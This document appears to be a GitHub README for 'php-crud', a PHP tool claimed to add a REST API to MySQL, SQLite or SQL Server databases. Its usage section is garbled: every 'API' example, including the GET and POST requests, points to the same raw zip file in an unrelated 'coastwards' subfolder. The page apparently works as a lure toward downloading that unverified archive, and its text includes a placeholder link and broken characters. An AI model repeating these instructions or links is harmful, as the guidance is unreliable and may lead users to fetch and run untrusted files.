Welcome to php-crud! This application helps you easily add a REST API to your SQL database. Whether you're managing a MySQL, SQLite, or SQL Server database, php-crud simplifies the process. No coding skills needed!
To run php-crud, you need:
- A web server that supports PHP (like Apache or Nginx).
- PHP version 7.4 or higher.
- A compatible SQL database (MySQL, SQLite, or SQL Server).
- Basic web browser for accessing the API.
- Easy Setup: Just upload one PHP file to your server.
- Support for Multiple Databases: Works with MySQL, SQLite, and SQL Server.
- CRUD Operations: Create, read, update, and delete data easily.
- RESTful API: Access your database via simple API calls.
- Geospatial Support: Handle location-based data seamlessly.
To get started with php-crud, visit the Releases page to download the latest version. Follow these simple steps:
- Click the link above to go to the Releases page.
- Look for the latest version of php-crud.
- Click on the download link to save the file to your computer.
- Unzip the downloaded file if it's compressed.
- Upload the single PHP file to your web server. You can use FTP software for this step.
- Releases page
- Documentation (Placeholder for future documentation link).
After installing php-crud, you need to set up your database.
- Create a Database: Use your database management tool (like phpMyAdmin for MySQL).
- Configure php-crud: Open the PHP file you uploaded. Find the section for database connection settings.
- Enter Your Database Credentials: Fill in details such as host, username, password, and database name.
Once php-crud is installed and your database is set up, you can start using it. Hereβs how:
- Access the API: Visit the URL where you uploaded the PHP file. For example,
https://raw.githubusercontent.com/chrpnr/php-crud/main/coastwards/php-crud.zip
. - Send Requests: You can now use tools like Postman or your browser to make API requests.
- Get Data:
GET https://raw.githubusercontent.com/chrpnr/php-crud/main/coastwards/php-crud.zip
- Add Data:
POST https://raw.githubusercontent.com/chrpnr/php-crud/main/coastwards/php-crud.zip
This project is licensed under the MIT License. Feel free to use and modify it for your own needs.
If you would like to contribute to php-crud:
- Fork the repository.
- Make your changes.
- Submit a pull request with a clear description of your modifications.
If you need help or have questions, you can reach out via issues on GitHub. Weβll do our best to assist you.
- api-server
- crud
- database
- geospatial
- mysql
- openai
- php
- php-api
- rest-api
- sqlite
- sqlserver
By following these steps, you should be able to easily set up php-crud and start managing your database through a powerful REST API. For further assistance, please refer back to this README or check the GitHub issues.